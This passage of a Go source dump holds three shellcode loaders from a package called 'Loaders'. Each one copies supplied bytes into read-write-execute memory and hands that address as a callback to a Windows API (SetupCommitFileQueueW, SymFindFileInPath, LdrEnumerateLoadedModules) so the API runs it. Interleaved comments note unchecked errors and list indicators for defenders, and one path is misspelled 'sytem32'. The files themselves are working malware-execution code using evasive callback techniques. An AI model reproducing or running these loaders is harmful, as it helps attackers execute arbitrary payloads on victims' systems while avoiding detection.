// image, and Setupapi.dll file-queue calls from a process that has no reason
// to install files, are the observable indicators.
34 | func Callback(shellcode []byte) {
// The allocation result is never checked: on failure addr is 0 and is still
// used as the copy destination and later as the callback pointer.
35 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
// &shellcode[0] panics on an empty slice.
36 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)))
// Queue handle; the error value is discarded.
37 | hQueue, _, _ := SetupOpenFileQueue.Call()
// UTF16PtrFromString only fails on an embedded NUL; the inputs are literals,
// so discarding the errors is harmless here.
38 | p1, _ := syscall.UTF16PtrFromString("c:\\")
39 | p2, _ := syscall.UTF16PtrFromString("\\windows\\sytem32\\")
40 | p3, _ := syscall.UTF16PtrFromString("kernel32.dll")
41 | p4, _ := syscall.UTF16PtrFromString("c:\\windows\\temp\\")
// NOTE(review): the queued copy job presumably just gives the commit
// something to process; nothing below reads its result.
42 | SetupQueueCopyW.Call(hQueue,
43 | uintptr(unsafe.Pointer(p1)),
44 | uintptr(unsafe.Pointer(p2)),
45 | uintptr(unsafe.Pointer(p3)),
46 | NULL,
47 | NULL,
48 | uintptr(unsafe.Pointer(p4)),
49 | uintptr(unsafe.Pointer(p3)),
// SP_COPY_NOSKIP is defined outside this excerpt.
50 | SP_COPY_NOSKIP,
51 | )
// Owner window for the commit; error discarded.
52 | Gtw, _, _ := GetTopWindow.Call()
// addr is supplied as the MsgHandler callback. The BOOL result is not
// checked, so a failed commit is silent.
53 | SetupCommitFileQueueW.Call(Gtw, hQueue, addr, NULL)
54 | }
55 |
-------------------------------------------------------------------------------- /pkg/SymFindFileInPath/SymFindFileInPath.go: --------------------------------------------------------------------------------
1 | package Loaders
2 |
3 | import (
4 | "fmt"
5 | "syscall"
6 | "unsafe"
7 | )
8 |
9 | var (
// Scratch output buffer whose address is passed to SymFindFileInPath as the
// FoundFile parameter. NOTE(review): the documented minimum for that buffer
// is MAX_PATH characters; 256 bytes looks slightly short — confirm.
10 | dummy [256]byte
11 | )
12 |
// Finfo receives whatever SymSrvGetFileIndexInfo writes through the pointer
// passed in Callback. NOTE(review): two native ints do not appear to match
// the SDK's SYMSRV_INDEX_INFO layout — verify before relying on the fields.
13 | type Finfo struct {
14 | timestamp int
15 | size int
16 | }
17 |
18 | const (
19 | MEM_COMMIT = 0x1000
20 | MEM_RESERVE = 0x2000
21 | PAGE_EXECUTE_READWRITE = 0x40
22 | NULL = 0
23 | TRUE = 1
24 | SSRVOPT_DWORDPTR = 0x00000004
25 | )
26 |
27 | var (
28 | kernel32 = syscall.MustLoadDLL("kernel32.dll")
29 | ntdll = syscall.MustLoadDLL("ntdll.dll")
30 | Dbghelp = syscall.MustLoadDLL("Dbghelp.dll")
31 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc")
32 | GetCurrentProcess = kernel32.MustFindProc("GetCurrentProcess")
33 | SymInitialize = Dbghelp.MustFindProc("SymInitialize")
34 | SymSrvGetFileIndexInfo = Dbghelp.MustFindProc("SymSrvGetFileIndexInfo")
35 | SymFindFileInPath = Dbghelp.MustFindProc("SymFindFileInPath")
36 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory")
37 | )
38 |
// Callback stages the supplied bytes in an RWX allocation and passes the
// address to SymFindFileInPath as its callback argument; dbghelp invokes it
// while searching for kernel32.dll under system32.
//
// Defender note: the indicators are the same RWX-then-callback sequence as the
// other loaders in this package, plus Dbghelp.dll being loaded and
// SymInitialize(fInvadeProcess=TRUE) being called by a process that does no
// debugging or symbol work.
39 | func Callback(shellcode []byte) {
// Allocation failure is not checked (addr would be 0).
40 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
// Panics on an empty slice.
41 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)))
42 | hProcess, _, _ := GetCurrentProcess.Call()
// TRUE is fInvadeProcess: dbghelp loads symbol state for every module already
// in the process. The return value is not checked.
43 | SymInitialize.Call(hProcess, NULL, TRUE)
44 | finfo := Finfo{}
45 | p1, _ := syscall.UTF16PtrFromString("c:\\windows\\system32\\kernel32.dll")
// Proc.Call returns (r1, r2, lastErr): the BOOL result r1 is discarded; r2 and
// the errno are kept only to be printed at the end.
46 | _, err3, err4 := SymSrvGetFileIndexInfo.Call(uintptr(unsafe.Pointer(p1)), (uintptr)(unsafe.Pointer(&finfo)), NULL)
47 | p2, _ := syscall.UTF16PtrFromString("c:\\windows\\system32")
48 | p3, _ := syscall.UTF16PtrFromString("kernel32.dll")
// dbghelp parameter order: hProcess, SearchPath, FileName, id, two, three,
// flags, FoundFile, callback, context. The finfo fields are passed by pointer
// under SSRVOPT_DWORDPTR; addr occupies the callback slot.
49 | _, err1, err2 := SymFindFileInPath.Call(
50 | hProcess,
51 | uintptr(unsafe.Pointer(p2)),
52 | uintptr(unsafe.Pointer(p3)),
53 | (uintptr)(unsafe.Pointer(&finfo.timestamp)),
54 | (uintptr)(unsafe.Pointer(&finfo.size)),
55 | 0,
56 | SSRVOPT_DWORDPTR,
57 | (uintptr)(unsafe.Pointer(&dummy)),
58 | addr,
59 | NULL,
60 | )
// Raw (r2, errno) pairs, not decoded; the SymSrvGetFileIndexInfo result is
// printed second although that call ran first.
61 | fmt.Println(err1, err2)
62 | fmt.Println(err3, err4)
63 | }
64 |
-------------------------------------------------------------------------------- /pkg/LdrEnumerateLoadedModules/LdrEnumerateLoadedModules.go: --------------------------------------------------------------------------------
1 | package Loaders
2 |
3 | import (
4 | "syscall"
5 | "unsafe"
6 | )
7 |
8 | var (
// g_InitOnce, lpContext and hNtdll1 are declared but never referenced by
// Callback.
9 | g_InitOnce [0]byte
10 | lpContext [0]byte
11 | hNtdll1 uintptr
12 | )
13 |
14 | const (
15 | MEM_COMMIT = 0x1000
16 | MEM_RESERVE = 0x2000
17 | PAGE_EXECUTE_READWRITE = 0x40
18 | NULL = 0
19 | )
20 |
21 | var (
22 | kernel32 = syscall.MustLoadDLL("kernel32.dll")
23 | ntdll = syscall.MustLoadDLL("ntdll.dll")
24 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc")
// GetModuleHandleW, GetProcAddress and LoadLibraryA are resolved but unused;
// Callback uses syscall.LoadLibrary / syscall.GetProcAddress instead.
25 | GetModuleHandleW = kernel32.MustFindProc("GetModuleHandleW")
26 | GetProcAddress = kernel32.MustFindProc("GetProcAddress")
27 | LoadLibraryA = kernel32.MustFindProc("LoadLibraryA")
28 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory")
29 | )
30 |
// UNICODE_STRING mirrors the native counted-string header (length fields in
// bytes, buffer of UTF-16 code units). Not referenced by Callback.
31 | type UNICODE_STRING struct {
32 | Length uint16
33 | MaximumLength uint16
34 | Buffer *uint16
35 | }
36 |
// Partial mirror of the loader's module table entry; not referenced by
// Callback. NOTE(review): the native structure is undocumented and longer than
// this — do not rely on these fields for offsets past the ones listed.
37 | type LDR_DATA_TABLE_ENTRY struct {
38 | InLoadOrderLinks LIST_ENTRY
39 | InMemoryOrderLinks LIST_ENTRY
40 | InInitializationOrderLinks LIST_ENTRY
41 | DllBase uintptr
42 | EntryPoint uintptr
43 | SizeOfImage uint32
44 | FullDllName UNICODE_STRING
45 | BaseDllName UNICODE_STRING
46 | Flags uint32
47 | LoadCount uint16
48 | TlsIndex uint16
49 | HashLinks LIST_ENTRY
50 | TimeDateStamp uint32
51 | }
52 |
// Doubly linked list node as used by the loader lists above.
53 | type LIST_ENTRY struct {
54 | Flink *LIST_ENTRY
55 | Blink *LIST_ENTRY
56 | }
57 |
// Shape of the per-module enumeration callback. Declared for documentation
// only: Callback passes a raw address rather than a Go function.
58 | type LDR_ENUM_CALLBACK func(ModuleInformation *LDR_DATA_TABLE_ENTRY, Parameter int16, Stop int16) uintptr
59 |
// Callback stages the supplied bytes in an RWX allocation and passes the
// address to ntdll!LdrEnumerateLoadedModules as the per-module callback, so
// the loader invokes it for each module in the process.
//
// Defender note: same RWX-then-callback indicator as the other loaders in
// this package; here the export is resolved from ntdll directly and invoked
// through syscall.SyscallN, so the observable is a native loader API receiving
// a function pointer into private executable memory.
60 | func Callback(shellcode []byte) {
// Allocation failure is not checked (addr would be 0).
61 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE)
// Panics on an empty slice.
62 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)))
// Both lookups discard their errors: a failed GetProcAddress yields 0 and
// SyscallN below would then call address 0.
63 | hNtdll, _ := syscall.LoadLibrary("ntdll")
64 | LdrEnumerateLoadedModules, _ := syscall.GetProcAddress(hNtdll, "LdrEnumerateLoadedModules")
// Arguments: ReservedFlag, callback, context. The returned status is ignored.
65 | syscall.SyscallN(LdrEnumerateLoadedModules, NULL, addr, NULL)
66 | }
67 |
--------------------------------------------------------------------------------
